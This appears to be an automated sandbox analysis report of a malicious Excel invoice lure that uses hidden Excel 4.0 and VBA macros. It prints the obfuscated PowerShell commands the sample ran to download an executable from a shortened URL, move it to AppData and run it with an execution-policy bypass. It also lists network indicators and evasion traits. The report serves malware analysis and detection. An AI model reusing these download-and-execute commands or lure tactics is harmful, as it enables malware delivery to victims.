Analysis Report Proforma Invoice.xls

Overview

General Information

Sample Name: Proforma Invoice.xls
Analysis ID: 320373
MD5: 55db711144ff4a35faf58d982e7cf727
SHA1: ea7b59dde9f0600915069dec66f8410f25cb66fd
SHA256: 6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
Tags: netwire, xls

Detection

Hidden Macro 4.0
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Bypasses PowerShell execution policy
Document contains an embedded VBA macro which may execute processes
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5944 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 4952 cmdline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 3060 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 488 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4804 cmdline: powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 5608 cmdline: cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6196 cmdline: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis; Data: Command: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5944, ProcessCommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), ProcessId: 4952

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://shopphongtinh.com/Ubnccbruoun7.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Proforma Invoice.xls; Virustotal: Detection: 14%
Source: Proforma Invoice.xls; ReversingLabs: Detection: 20%

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\cmd.exe
Source: global traffic; DNS query: name: cutt.ly
Source: global traffic; TCP traffic: 192.168.2.3:49731 -> 104.22.1.232:443
Source: Joe Sandbox View; IP Address: 202.92.6.10
Source: Joe Sandbox View; IP Address: 104.22.1.232
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown; DNS traffic detected: queries for: cutt.ly
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0; Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0; Screenshot OCR: Enable Content"
Source: Document image extraction number: 1; Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1; Screenshot OCR: Enable Content"
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation; OLE, VBA macro: Module Module1, Function auto_open, API Run("Auto_ouvrir51")
Found Excel 4.0 Macro with suspicious formulas
Source: Proforma Invoice.xls; Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: Proforma Invoice.xls; Initial sample: High usage of CHAR() function: 37
Source: Proforma Invoice.xls; OLE, VBA macro line: Sub auto_open()
Source: VBA code instrumentation; OLE, VBA macro: Module Module1, Function auto_open
Source: Proforma Invoice.xls; OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kdscli.dll
Source: classification engine; Classification label: mal92.expl.evad.winXLS@16/20@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{8ED223E6-2CD3-4708-A7C8-18A95E15034E} - OProcSessId.dat
Source: Proforma Invoice.xls; OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: Proforma Invoice.xls; Virustotal: Detection: 14%
Source: Proforma Invoice.xls; ReversingLabs: Detection: 20%
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb{ source: powershell.exe, 00000006.00000002.381219156.00000000005DF000.00000004.00000001.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000003.430916634.0000000007E31000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000003.430528579.00000000095CD000.00000004.00000001.sdmp

Data Obfuscation:

Obfuscated command line found
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
